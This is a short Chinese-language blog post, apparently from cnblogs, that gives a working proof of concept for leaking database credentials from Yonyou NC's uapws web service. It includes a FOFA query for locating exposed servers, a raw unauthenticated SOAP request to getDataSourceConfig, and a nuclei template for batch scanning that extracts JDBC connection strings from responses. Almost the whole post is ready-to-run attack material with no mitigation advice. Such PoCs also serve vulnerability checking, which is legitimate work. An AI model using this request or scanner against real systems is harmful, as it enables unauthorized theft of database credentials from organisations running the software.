用友NC uapws接口老版本存在数据库账号密码泄露

漏洞复现

fofa语法:app="用友-UFIDA-NC"
POC:

POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
                 <soapenv:Header/>
                 <soapenv:Body>
                    <por:getDataSourceConfig/>
                 </soapenv:Body>
                </soapenv:Envelope>

nuclei批量yaml文件

id: yonyou_NC-uapws-database-read

info:
  name: yonyou_NC-uapws-database-read
  author: nigori
  severity: high
  description: fofa app="用友-UFIDA-NC"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: yonyou,nc,oa,bjxsec

requests:
  - raw:
      - |
        POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
         <soapenv:Header/>
         <soapenv:Body>
            <por:getDataSourceConfig/>
         </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "jdbc"
        part: body
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '(jdbc:.+\:\d{1,5}\:\w+)'
posted @ 2023-09-07 15:55  学安全的小白  阅读(1152)  评论(0编辑  收藏  举报